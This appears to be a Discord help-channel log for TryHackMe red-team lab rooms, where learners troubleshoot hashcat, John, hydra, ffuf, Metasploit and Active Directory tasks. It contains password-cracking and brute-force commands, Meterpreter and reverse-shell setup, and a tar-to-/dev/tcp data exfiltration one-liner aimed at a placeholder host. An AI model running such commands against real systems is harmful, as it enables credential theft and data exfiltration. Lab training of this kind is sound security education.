This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

clCreateContext(): CL_DEVICE_NOT_AVAILABLE

Started: Sat Nov 23 10:17:07 2024
Stopped: Sat Nov 23 10:17:07 2024

The issue your are facing:

1. OpenCL Driver Issue: The warning indicates that the driver might fail or produce unreliable results.

2. CL_DEVICE_NOT_AVAILABLE: Indicates that no compatible device is available to run the hashcat task.

1. Update Hashcat:

You're using an older version (v6.1.1). Update hashcat to the latest version:

sudo apt update && sudo apt install hashcat -y

2. Update OpenCL Drivers:
Check your GPU's driver and ensure it supports OpenCL properly:

For NVIDIA GPUs: Install the proprietary driver and CUDA toolkit.

sudo apt install nvidia-driver-<version> nvidia-cuda-toolkit

For AMD GPUs: Install ROCm or proprietary AMDGPU drivers.

For Intel GPUs/CPUs: Install Intel OpenCL Runtime.

3. Run Hashcat in CPU Mode: If no GPU is available or drivers cannot be updated, use CPU-only mode:

hashcat -D 1 -m 100 -a 0 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt

The -D 1 flag forces hashcat to use the CPU.

4. Force Execution: If you're confident in your setup but still see the warning, you can use the --force flag:

hashcat --force -m 100 -a 0 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt

5. Verify OpenCL Installation: Test if OpenCL is working on your system using the following command:

clinfo

If no devices are listed, recheck your drivers.


6. Alternative Workaround: If the issue persists, you can:

Use an online cracking tool for learning purposes (ensure it's a safe and legal platform).

Use a preconfigured VM with a compatible environment, such as those provided by TryHackMe ```

Let me know if this works

You can also use the John ripper tool

echo "8d6e34f987851aa599257d3831a1af040886842f" > hash.txt


2. Identify the Hash Type: You mentioned -m 100 in hashcat, which corresponds to SHA-1. John automatically detects the hash type, but if needed, you can specify the format.


3. Run John with the RockYou Wordlist: Use the following command to crack the hash with the RockYou wordlist:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt


4. View the Cracked Password: Once John finishes, you can view the cracked password with:

john --show hash.txt

@mint palm

Which device are you running this in?

I hate windows rooms I don't know why

its because: Windows

I restarted the AttackBox and it worked.

I was using the AttackBox from THM on a Windows machine and on MacOS

Hashcat won't work in a VM, it's better to use your host for that

Good to know, thanks for the help ❤️

Gave +1 Rep to @vast quest (current: #1 - 3020)

What does i'm missing at Password Attacks Online Attacks Task 8?
I created the dict.lst with the password in it. I already checked the answers of the question. But I cant get it by myself.
Thats the command i used and the output I get:
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://10.10.74.210:465 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 18:23:29
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10500 login tries (l:1/p:10500), ~657 tries per task
[DATA] attacking smtp://10.10.74.210:465/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[VERBOSE] Disabled child 11 because of too many errors
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[VERBOSE] Disabled child 0 because of too many errors
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 18:24:01

The issue lies in the incorrect usage of the Hydra command for SMTP with SSL/TLS (port 465). Port 465 uses implicit SSL, which requires additional configuration in Hydra.
Try running the following command:
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp -S -o output.txt -V -f -e ns -s 465 10.10.74.210

Your protocol isn't right.
Check the question again.
Here is my command.
||hydra -l pittman@clinic.thmredteam.com -P dict.lst smtps://10.10.74.210:465 -v||

@limber geyser @static root Thanks for the help und sorry for wasting your time, because of a typo...

Gave +1 Rep to @limber geyser (current: #200 - 35)

Hello

Is there a chat for the OpSec Room?

I am unsure how to solve the path without the numbers being displayed

Can you take a screenshot?

why hashcat dont work in the attackbox?

Hashcat isn't great in a vm.

Use your host, or use john.

Hello

Can I DM anyone about this pathway

Someone who has finished the evasion portion

I would suggest posting your question here and someone who is knowledgeable would surely chime in.

Hi everyone, has anyone had experience with environments and boxes using Roaming Profiles?

I'm currently going back through some areas of the red teaming path after having 100% it, redoing the AV Evasion: Shellcode room and I'm running into some weirdness with the checker.

I've been using my own code from the NTAPI, successfully receiving shell from the command prompt and successfully passing the AV checker with NtCreateThreadEx in both active and suspended states.

Even though the checker greenlights me I can't get it to dump flag at the same time. Is the THM checker looking for the exact syscalls described in the room? The lesson can't be looking for the exact port number seeing as I've used it twice now in msfvenom (LPORT=7474) without success.

This path is kinda weird. It has rooms that has pre-requisites of rooms and tools you haven't done in the path.

To do this room, please make sure you have done: X/Y/Z/A/B/C/D/E/F/G before as you will need to know about it to know how to perform these tasks

and then those rooms are like later in this path

To be fair, it is at the bottom of the path

Yeah? Rooms within red teaming path require you to have done rooms that are later in the red teaming path

e.g Lateral Movement room (which is an early room in the red teaming path) wants you to have done breaching AD rooms (which is an late room in the red teaming path)

Ah I see what you're saying, mb. Early 🙂 Makes me think of the Charlie Day meme 😄

https://tenor.com/view/charlie-day-gif-18564553

Task-8 : Windows Local Persistence: Red Team - web shell is not working for me

Persisting Through Existing Services : both the task confusing

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx - Do we need to perform any changes in this code ?

Does the Lateral Movement and Pivoting room work for anybody? I am having trouble at Task 1 getting DNS to work its not resolving for some reason...

Do you have the interface?

I have the latermovement interface and it shows that I am connected on THM. I have regenerated the server file a few times. I can ping the DC, but when I attempt to access http://distributor.za.tryhackme.com/creds DNS can't find the address. This does not work on the attack box or my kali VM. I was just curious if its me or someone else is experiencing the same thing.

Hello guys, got a question about weaponization room, I'm able to remotely access the target machine through metasploit but I can't seem to find the flag.txt tried also finding it manually in the win10 machine itself but there's nothing to be found

Can you provide a room link 🙂 ?

https://tryhackme.com/r/room/weaponization

Which Task and can you provide a screenshot of the problem 🙂 ?

Sorry I'm off computer right now, will provide later when I get on, basically on the last task since it has the flag for it

Ok , feel free to reach out later we will definitely figure something out 😄

Thank you, very much appreciated 😁

Gave +1 Rep to @lavish axle (current: #3 - 2136)

Hello again! Uploaded the screenshot in here even though solve in using online resources I'm thinking if it's a big within the room

https://drive.google.com/file/d/1YcKHh61QDFyK13Hm2b2sRB3EUuu6Z96h/view?usp=drivesdk

Uploaded the screenshot

Can you please verify and upload the screenshot here 🙂

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Thanks hahahaha I was on the phone discord searched the Google how to's lol thought discord can't really upload images on phone, but nevertheless I'm verified 😁

Gave +1 Rep to @lavish axle (current: #3 - 2146)

Task 6 🙂 ?

Ohhh task 6 wait a minute, gut busted not doing it one by one lol, thought "it's just another way into it" doing it right now

Is everything ok now 🙂 ?

Will update attackbox loading 😁

Ok , I should be here 🙂

Done with act 6 still no traces of flag.txt

I saw on a YouTube video it should exist on the desktop as "flag.txt"

Sometimes you need to wait a few min before the flag pops-up , try again in 5min and give us an update 🙂

I'm also confused with my connection as you can see I can execute the reverse shell but ping and accessing the web application, times out, is it a factor that I'm using a company managed network?

Well , this is a Windows machine probably doesn't respond to pings

Well the important thing is knowing kinds of attack we can do to a target 😁 thanks for the help! Moving on to the next room

Is everything ok now 🙂 ? Were you able to finish the room ?

Did finish the room looked out some tutorials online for the flag itself, tried other attacks myself especially on metasploit reverse shell since I'm most familiar with it.

Congrats , keep up the good work 😄

$ tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/<IP>/<PORT> nice obfuscation using EBCDIC 🤓

hi

any one here which has little bit knowledge about AWS

Try to ask in #infosec-general channel , this channel isn't active that much 🙂

https://tryhackme.com/room/obfuscationprinciples i uploaded the powershell snippet in task 4 without any obfuscation and it gave me the flag

Still says I failed

Try typing manually, copy/paste may have an encoding issue

This has still not been fixed
It's from the Data Exfiltration room on this pathway

Try to repirt it in new #1333993673381253162 channel 🙂

Amen

Hello

Are all of the AD rooms connected

Are they are one single AD infrastructure?

hi can anyone help me every time i use my packed shellcode i get user thm but not av victim but i followed these provided setps

so i cant get the flag

It appears that both the AttackBox and Kali Linux do not have the enumad network adapter for room https://tryhackme.com/room/adenumeration

I have reset the network as well to see if this would resolve it. THMDC = 10.200.18.101 and there appears no route to ping the IP either. I will give the VPN a try next. 🤔

ah! this is not an uncommon issue for this room💡

AttackBox /root/Desktop/NetworkConfigs/adenumeration.ovpn is a 0 byte file size. Downloading the VPN adenumeration network file is also a 0 byte file size.

Network state: Running

Try to leave the room and re-join. Then try to download new vpn file . Start the network beforehand

ah ok, thanks

@lavish axle thanks! The Options > Leave and a re-join solved it. Right away I notice the subnet was different. The enumad network adapter exists on the AttackBox, and I can ping the THMDC now. Thanks so much. 🙂

Gave +1 Rep to @lavish axle (current: #1 - 3876)

Hello everyone, I have a question about TryHackMe paths. Should I complete all the paths leading to the Red Teaming path before attempting challenges, or is it okay to start challenges while I'm still in the Cyber Security 101 path? (I don't have any prior knowledge in cybersecurity.)

I would recommend you to complete Cyber101 first 🙂

Ok, thanks for the help.

Gave +1 Rep to @lavish axle (current: #1 - 3984)

Hey guys, good morning ☕ , I am currenctly completing task5 of https://tryhackme.com/room/lateralmovementandpivoting . The tasks says : Both mimikatz and psexec64 are available at C:\tools on THMJMP2. however, i can't find mimikatz underneath that directory :

za\t2_felicia.dean@THMJMP2 C:\Users\t2_felicia.dean>dir c:\tools                                                                
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is F4B0-FCB9                                                                                              

 Directory of c:\tools                                                                                                          

03/21/2025  02:57 PM    <DIR>          .                                                                                        
03/21/2025  02:57 PM    <DIR>          ..                                                                                       
06/14/2022  08:27 PM            45,272 nc64.exe                                                                                 
04/19/2022  09:17 PM         1,078,672 PsExec64.exe                                                                             
03/16/2022  05:19 PM           906,752 SharpHound.exe                                                                           
06/19/2022  05:38 AM    <DIR>          socat                                                                                    
               3 File(s)      2,030,696 bytes                                                                                   
               3 Dir(s)   9,290,481,664 bytes free                                                                              

https://tryhackme.com/room/breachingad
why doesent it resolve?

Hi everyone, I am in the Red Team Recon room and when I run task 6 I get this error message. How can i solve it? Thanks

[recon-ng][thmredteam] > modules load google_site_web
[recon-ng][thmredteam][google_site_web] > run

--------------
THMREDTEAM.COM
--------------
[*] Searching Google for: site:thmredteam.com
[!] Google CAPTCHA triggered. No bypass available.

It's been a while since I did that room but IIRC shouldn't av-victim be the user you're currently running as in the split screen, and not the user you're performing privesc to?

add the dns in network settings like: 10.10.1.125, 1.1.1.1
to get the dns of the dc and for internet
dont forget to restart the service like they say

but i think thats only if you use your own kali
thats what i did and it worked great

PLS UPDATE Room Lateral Movement and Pivoting
It takes so much time to do the Tasks because the infrastructure is not working!!

is there something broken with the CORS & SOP room? i cant complete the regex task and im following it to the T, all i had to change was one thing and the first abitrary task worked so...? am i doing it wrong?

wrong room my bad

which task ?

can anyone help me out with this problem on tryhackme password attacks room,

What is the crunch command to generate a list containing THM@% and output to a file named tryhackme.txt?
my answer is crunch 5 5 -t THM@%^^ -o tryhackme.txt
and im trying different answers for the -t argument and nothing seems to work

@ and % are special characters and we can use ^ to denote special characters 🙂

❓ I'm at "Insecure Permissions on Service Executable" of task 5 of Windows Privilege Escalation. The step where you copy the payload file over the service executable fails: The process cannot access the file because it is being used by another process. If I stop the service first it works of course. Also the command "icacls WService.exe /grant Everyone:F" fails with "C:\PROGRA~2\SYSTEM~1\WService.exe: Access is denied." Not sure I understand why this command is important as I can control the service the payload works anyway when I start the service. So, because of the 1st error am I correct to assume this exploit will not work if you don't have the privs to control the service?

@lavish axle bro, I want to ask if there is a topic about fishing. I have finished the topic of fishing in thm, but I think it is still too shallow.

I would like to learn something about the teaching of file bundling fishing.

This room maybe
https://tryhackme.com/room/phishinghiddeneye

Er.. What I want is teaching about file bundling fishing🤔 🤔

I would say, yes. Without access to WService.exe, you shouldn't be able to escalate your privileges.

"^" is used to implement special characters like @ and % into the word you specify. also be sure to include quotation marks when putting in a string into the terminal

Did you added that ip and domain in /etc/hosts?

Hey i'm doing the AD rooms, i've never worked on AD so this question might sound stupid but I don't understand what rights are needed for each commands. I feel like there is no admin right needed for things like enumeration as it's never really said in the rooms (or at least I didn't found it), but I find it crazy that any user can do Get-ADUser -Identity Administrator -Properties LastLogonDate,PwdLastSet

Good evening, sorry if someone can tell me what are the answers to these questions that are the only ones I have left and there is some problem because if I run Nmap with the script it does not give me the right result. Start the AttackBox if you have not already done so. After making sure you have killed the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC on MACHINE_IP. You will notice that there is a service listening on port 53. What is its full version value?

According to its description, the ssh2-enum-algos script "reports the number of algorithms (for encryption, compression, etc.) offered by the target SSH2 server". What is the name of the server's host key algorithm that is based on SHA2-512 and is supported by MACHINE_IP?

Of the room: Jr Penetration Tester
Network Security
Nmap Post Port Scans

I solved the problem, it was in the machine where I was running nmap that was not working well.

How to hack website because I find some but I don't understand how to do it

Hi everyone, I am preparing for OSEP that starts pretty soon, do you guys know if there are any rooms/networks/paths in THM (VIP is also fine) that can help me with my OSEP preparations?

If you're replying to the above text, please reference it while responding so that I get a notification or either please drop a text in my DMs, either approach will work just fine for me and will be much appreciated, thanks.

Hello...this is my first time here and I'm aspiring to be a red teamer in the future, can anyone suggest and roadmap to start this journey?

You can follow this one
https://tryhackme.com/hacktivities

Thank u!!

Gave +1 Rep to @lavish axle (current: #1 - 5689)

hey guys
Just finished learning basic x86_64 Intel Assembly (System V ABI).
Now I wanna dive into Reverse Engineering, mainly for CTFs.

What’s the best way to start?
Any good beginner resources / courses?
Need some roadmap or tips please .

Any old heads in here?

yeah... whats up???

Shadow can I dm you?

NOPE

Ok thanks.
quick question what do you do when your browsing certain things for ethical purposes of course and you see this??

LiveOverFlow's YouTube series named Binary Exploitation is an in depth tutorial with examples that teaches you many ways how to approach this topic

https://youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&si=Z7LUZ4LVpZhpnmw9

@lavish axle How I can learn stealthly windows system exploitation techniques. Is there any resources?

Check this one out
https://tryhackme.com/room/windowsprivesc20

Hello

Fellow red teamers

Can't wait to start this path!

Hi all. Red Team Threat Intel, Task 7. When answering the first question according to hint, it says "At least one of your answers is incorrect.". In addition, can someone tell me if the mapping fron the kill chain to mitre atta&ck is correct?. Because i believe that exploitation from the Lockheed Martin Cyber Kill Chain is must be mapped to persistence in the MITRE ATT&CK framework. Lastly, i think that mitre navigator for the APT 41 doesn't give the right answers. Any help??

Can you provide a shot of your sorting 🙂

Hey all. I'm on the capstone challenge. I simply cannot capture any flags as i simply continue getting connection refused from the network. Am i missing smomething?

thank you

Gave +1 Rep to @stoic marten (current: #3086 - 1)

Hi, I’m doing the room ExploitingAD, Task 5.
I generated the Meterpreter payload (windows/x64/meterpreter_reverse_tcp and also tried the staged one), served it via Python HTTP, downloaded with certutil on THMSERVER1, and executed with powershell -ExecutionPolicy Bypass -File.
The payload runs (I see the PID printed), and my handler in Metasploit receives the connection attempt, but the Meterpreter session immediately closes or never fully opens.
I’ve confirmed my LHOST = 10.50.69.127 (VPN IP) and tested with multiple ports (80, 443, 4444, 9001). Same result.
Is there a known issue with the THMSERVER1 VM or firewalling in this task?

Hi all. Red Team Intro to C2, Task 7. I don't understand which IP ADDRESS must enter in "set OverrideLHOST" when i'm trying to configure metasploit "msf6 exploit(multi/handler) >", in order to set up a redirector. I understand what is going on with the LHOST (my public IP ADDRESS) or for the lab will be 127.0.0.1, but will it be the same IP as LHOST??. Any clue??. Thanks.

thanks for your response. I finally figure it out. Thanks though...

Gave +1 Rep to @lavish axle (current: #1 - 5863)

Hi all. I' m currently in the Password Attacks room, Task 3, where it says "Apply what we discuss using cewl against https://clinic.thmredteam.com/ to parse all words and generate a wordlist with a minimum length of 8. Note that we will be using this wordlist later on with another task!", but the cewl command couldn't be found from linux, neither can install it. Any help??

How can't you install it ?

why can't i send screenshot if need help

You need to verify first , follow instructions from the link below to learn how to do so 🙂

Hi. First of all, I want to thank you for your support. Now, in my case i tried to install cewl running the command: apt install cewl as root. But everytime i got errors. I'll try to upload a screenshot, if that helps.

Gave +1 Rep to @lavish axle (current: #1 - 5876)

Hi all. Because i'm new here, can someone tell how to upload a screenshot?. Thanks in advance.. I also hane verified my account.

You didn't yet , follow instruction from the link below , Discord verification is separate thing from site verification 🙂

I tried to find my token key under my account, but nothing is there. Am I looking for token on a wrong place??

Token on THM profile page not on Discord

Thanks a lot. I'm just tired from work and i kept searching into discord for my token. Much appreciate it.

Gave +1 Rep to @lavish axle (current: #1 - 5877)

So, here is my screenshot where i was trying to install cewl. Worth noting, when i tried to use cupp, i had the same problem but i figured it out by navigating to the cupp directory. That didn't work with cewl.

Try to use your own machine for cewl if possible I think that AttackBox requires an update to download cewl but I am not sure if it has enough space and even if it does it will be reverted to its default configuration at the next startup so it's not worth the effort

Do you mean that i have to setup a VPN connection and enter tryhackme from my machine?. Because i don't know how. How ever on my kali, cewl command and every command so far is being executed perfectly. To be honest, when i start the attacbox i get a couple of errors that can be mount hard drives.

Yeah , you can learn how to do so on this link 🙂
https://tryhackme.com/room/openvpn

Thank you very much. I'm already being connected over OPENVPN. I was afraid that I couldn't handle it, but here I am...LOL.

Gave +1 Rep to @lavish axle (current: #1 - 5882)

What kind of a Redteamer wannabe if i can't use VPN...LOL. Seriously now thanks for your advise. Keep up. I know i'm gonna need you soon enough......

Hi again. Room "Password Attacks", Task 8, where the second question tell me to generate a rule-based dictionary from the wordlist clinic.lst in the previous task. email: pittman@clinic.thmredteam.com against 10.10.2.109:465 (SMTPS). So i have done all the requested things, but when I use hydra to attack against the SMTPS i get a message that says "[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: C[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server". Worth noting that i tried the same from my machine and from the attack box using ssh.. Any help??

I also did not find out token on THM profile

Hi. Ifound the token by clicking at the top right of the page (robot head icon) and from the dropdown menu you have to select manage account. Scroll down and you wiil see discord token.

Click on your profile image on thm > managae account settings and scroll to the bottom of the page

Hi all. The Lay of the Land room, Task3. Despite the fact that task 3 says for remote connection to windows target machine, in fact there isn't an attack box to use xfreerdp. Trying to connect over openvpn, I got stuck because of the presence of kerberos. Can someone help me how to connect remotely to the windows target machine. I don't know how to configure krb5.conf file in order to bypass kerberos authentication process (I have username and password, IP Address, but not a domain name of the target machine, if there is any. Any hint please??

I see that the last message came from me. So, here is another one.....Hi all. Exploiting Active Directory room task 7. I'm getting an error three days now while using Rubeous. I have followed the instructions to the point "My initial account (creds from task1) is part of the IT group. It has RDP privilege to THMSERVER2 and at the account properties in Active Directory Users and Computers (ADUC), I granted it permissions to sha256 encryption". But when I export a certificate , editing the encryption aes256 and using Rebeus to request a Kerberos ticket-granting ticket (TGT) I'm getting an error "KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP. Any help??. It's the third day I'm trying to pass this task.

Any hint or help on this?

I did the same thing but i guess the wordlist generated is too big and taking too much time

is this free?

Majority is

Hi I am currently working on ICMP exfiltration in the data exfiltration room. I tried to exfiltrate the data through MSF's icmp_exfil module to my kali VM that is connected to the VPN and It doesn't work, no error, just the warning below. Does anyone has any suggestion?
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/packetfu-2.0.0/lib/packetfu/capture.rb:63: warning: undefining the allocator of T_DATA class PCAPRUB::Pcap

Anyone have an idea on how to change serial for Nvme m.2?

Wdym by that ?

.

Hi. I'm facing the same issue several days now. I asked echo for this warning and said that is not an issue and that metasploit should be able to receive the npings command from icmp-host. Furthermore I used wireshark and tcpdump and i received the incoming packets. On wireshark I was able to see the data (admin and password). In the task examples we see that one packet was sent nad two packets are being received. On our kali we see that one packet is sent and one is received. I think that is the difference between attackbox and tryhackme metasploit and our kali's metasploit. I'm still trying to fix this. If someone can help, KGB maybe??

Yes. I used a custom wordlist instead to save time.

guys, i wanna learn writing python script for automation like submit request and fetch the sessionId and stuff. I want to write this script for solving Hammer room. Do you have any advice or recommend resource?
Can you guys suggest me some famous libs like request or something that i can research more?
Thanks very much for your help!!!

Hi
I have having issue while executing hascat on the lab machine Red Teaming>>
Initial Access>>Password Attacks task 5, how to resolve this

can any one help me on this

i get this when executing hashacat

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

I avoid using hashcat on a VM, it works best on a host (like Windows)

Maybe try asking in #subscriber .. reading is essential so it can't be helped. 😅

Can someone tell me if I have the best gmail account please?

Firstname:Hackme Lastname:Please
0daydelivery@gmail.com

I'm in the Intro to C2 room, and am trying to connect to Metasploit through Armitage, but keep running into the "Connection refused" error. Any idea how to fix it, pls?

that shutting down message in your screenshot seems to be the issue: there is no server with port 55533 to connect to any more, hence ./armitage command cannot complete
was that shutting down message generated after issuing Ctrl+C ?

Yeb, it was generated after the Ctrl+C

when trying to run msconfig as joe, it gives me uac prompt
so then I runas as mark who is part of the local admin group
I run msconfig via cli as mark and it works
ok so it means my shell is now elevated when I run as mark, right? bc now I can run msconfig

so why does it not let me move to the admin user folder?

I have to use msconfig > tools > select command > cmd.exe > launch
it pops up a new cmd shell
now I can cd to the admin folder

I'm trying to add images to add context but it's not letting me

how to run DeimosC2 linux????

paulchikkkk@75a01e DeimosC2_linux % ls
agents go.mod lib
archives go.sum modules
DeimosC2 gopath requirements.txt
droppers goroot resources
paulchikkkk@75a01e DeimosC2_linux % ./DeimosC2
zsh: exec format error: ./DeimosC2
paulchikkkk@75a01e DeimosC2_linux % sudo DeimosC2
Password:
sudo: DeimosC2: command not found
paulchikkkk@75a01e DeimosC2_linux %

You need to verify your account to post images

@clever flicker

Hay gays

https://tenor.com/view/dexter-james-doakes-surprise-mf-can't-prove-it-gif-7408854170742055240

Is the Attackbox not prepared to run 'cewl' commands? I am doing the Password attack room and have lost already 30 minutes trying to install all kind of Ruby gems lol

Evil-winrm takes much time to download files is there another better alternative please?

why you do this to us thm

you mean to tell me the answer is the opposite? I don't get it

@worthy grove Sorry mate, I think the magic bytes are actually 4D 5A (MZ).
Those are the first two bytes at offset 0x00 in every PE file.
Sometimes THM is a bit picky with the format like whether they want spaces, lowercase, or no prefix.
So the value is correct, it just depends on how they want us to type it.

All right thanks mate. I was loosing it lol

Gave +1 Rep to @vocal creek (current: #3258 - 1)

..................................................................................................................................

+++++++++++++++++++++++++++++.-

hello guys if any one have try hack me coupon pls dm me

Hey guys
Gud day

Pls am looking for a cyber security mentor,am in need of someone to work with,help while growing myself

My RDP disconnects as soon as I login, if anyone logins will it forcefully disconnect me?

Try with Another VPN,
today i was solwing the red team path , im facing the same situations , after booting the vm it will teminated within 5 minutes , then i change the vpn from Europe to India Mumbai or The other one... Now its perfectly working .

Aight I'll give it a shot, hope it works!

guys it's been a pleasure !

heading to my next adventure

that's amazing mate!!

really proud of your progress

keep it up and enjoy your next adventure (:

@river lagoon Thank you!

Gave +1 Rep to @river lagoon (current: #3360 - 1)

Hello everyone! Took the quiz on the site and looks like I got red team.

that's cool! go ahaed and start your journy in this field

wish you all the best

Thank you, just starting fresh, logical next step is go through the cyber sec roadmap.

Gave +1 Rep to @river lagoon (current: #2189 - 2)

Is the AD server down?

Keeps showing me 500 code error

Trust Will will barely come out alive in this one 😂😂

Xup guys

I just came in contact with a crypto projects hosting a hackathon where prize is $100,000
Isn't this exciting

Details

Anyways are thm servers down?

I’m gettin error

In red team lateral movement room

Sure thing
Here or dm?

Hmmm,have their support acknowledged this?

Dn

Can anyone tell me which lab i should consider. I want to get in the red team

As a beginner*

Hello I have a question after completing the intro on tryhackme do I have to pay to progress further I'm a newbie so...

@south terrace yes but its worth every penny

@rocky matrix if you just started as a beginner on the tryhackme you should consider the "pre-security" and "cyber security 101" then you can choose the JR Penetration path to work as JR pentesting and red teaming

remember for red teaming you will have to work hard (Even I'm doing the red teaming and I'm on the cyber security 101).

Ok I'll check it out

Oh cool sounds fun

I don't mind a challenge to be fair

really cheap too

some services extort u but tryhackme has such a fair price icl

Hi

@south terrace yes

@heavy scaffold yeah it is

That's good then

Hii

Hi

im doing Breaching Active Directoryim not able to ping the THMDC im using the attack box

Same here

@wispy root it dosen't work try to restart the VM or just use google

Anyone encounter trouble accessing the websites that are part of the labs in Advanced SQL Injection?

wouldn’t work yesterday gave it some time, tried today no dice.
Also tried connect vs VPN.. I normally use Attackbox but just trying stuff at this point

I pay for the premium access so it’s annoying to continually run into connectivity issues with THM

Ran most test with added to /etc/hosts and without

Can someone explain why this command is failing on the TakeOver challenge:

ffuf -w wordlist.txt -u https://$rhosts/ -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100

    /'\  /'\           /'\
   /\ _/ /\ __/      /\ __/
   \ \ ,\ \ ,/\ /\ \ \ \ ,\
    \ \ _/ \ \ _/\ \ _\ \ \ \ _/
     \ _\   \ _\  \ _/  \ _\
      //    //   //    /_/

   v2.1.0-dev

__

:: Method : GET
:: URL : https:///
:: Wordlist : FUZZ: /home/kali/wordlist.txt
:: Header : Host: FUZZ.futurevera.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4605
__

:: Progress: [37125/37125] :: Job [1/1] :: 38461 req/sec :: Duration: [0:00:01] :: Errors: 37125 ::

Did you add that domain to your /etc/hosts file

as far as I know I did

may I paste the /etc/hosts file here or is that a spoiler ??

here it is:

127.0.0.1    localhost
127.0.1.1    kali
10.82.146.133   futurevera.thm portal.futurevera.thm payroll.futurevera.thm blog.futurevera.thm support.futurevera.thm secrethelpdesk934752.support.futurevera.thm
::1        localhost ip6-localhost ip6-loopback
ff02::1        ip6-allnodes
ff02::2        ip6-allrouters

@coral marten You did not set $rhosts as is clear from the URL in the output of ffuf: :: URL : https:///

oke

I m sure I did that

but I will try again

but it will be tomorrow or so
it is not late

I'm new to this path and I want to become strong in it. What do the path experts advise me to do?

Are you running this command where you have your wordlist.txt?

yep

Have you enabled the flag where it will ignore the check for certificate validity or something along those lines?

Enable what flag?

Did your command have the -k flag? As the certiticate for the room is self-signed or doesn't have a valid CA, if I remember correctly

no, I did this command:

ffuf -w wordlist.txt -u https://$rhosts/ -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100

and I see something wierd

┌──(kali㉿kali)-[~]
└─$ export RHOSTS=10.81.142.180
                                                                             
┌──(kali㉿kali)-[~]
└─$ echo $RHOST                

Why when i do echo the variable is empty

still wierd

I try this:

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://futurevera.thm/ -H "Host: FUZZ.futurevera.thm" -fw 1 -t 100

ffuf -w wordlist.txt -u https://$RHOSTS/ -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100

the first one works and give me two subdomains

Second one does not work

@spare depot any idea why the first one works and the second not

futurevera.thm is one of the many possible virtual hosts that is running on the host

Should be RHOSTS in the second command

so no $ before it ??

Have you confirmed that both words appear in both lists?

I was referring to your echo command here.

yes

^

i think it has to do something with the RHOST variable

It could be on the web server configuration

I assumed that was the website which has to be cracked

In the case of web servers hosting multiple sites, if you just give it the IP address, the web server wouldn't know which web site you are trying to access / request.

when I replace it with https://futurevera.thm then the script runs but do not give the right answer

Did you put in the -k flag when you run ffuf against https?

maybe I have to do the pentester course before I try this one against

You may or may not do it in that order. While it is recommended, each person may have their own path to follow based on their background and interests.

Then nothing happens when I do:

ffuf -w wordlist.txt -u https://futurevera.thm -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100 -k 

and now the other command is also not working

I try again after lunch

In an HTTPS scenario you should specify the IP address of the target server in the -u option instead of the host/domain name. The reason is that, when using ffuf with HTTPS, the TLS client will use the value in the -u option to fill in the Server Name Indication (SNI) extension in its Client Hello. It does this to allow the server to select the correct vhost certificate. However, this will fail as the server has no vhost for futurevera.thm. So, you should change your ffuf command to

ffuf -w wordlist.txt -u https://a.b.c.d -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100 -k

with a.b.c.d being the ip address of the server.

This will also work because here you specifically set the SNI to the IP address which causes the SNI to be omitted in the Client Hello

ffuf -w wordlist.txt -u https://futurevera.thm -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100 -k -sni a.b.c.d

It seems gobuster handles this better as this just works in gobuster:

gobuster vhost -k -u https://futurevera.thm -w ~/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --domain futurevera.thm --append-domain

Btw, -k option only disables client-side cert check. It does not prevent cert selection to fail server-side because of wrong SNI.

with hackerbox how can I install things like cewl
I know get this message:

Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

@pallid pine no luck in kali vm
first one gives me:

:: Errors: 8626 ::

Second one works

So, ffuf with -sni option works?

What's the output of this command?

getent hosts futurevera.thm

yep and go buster also

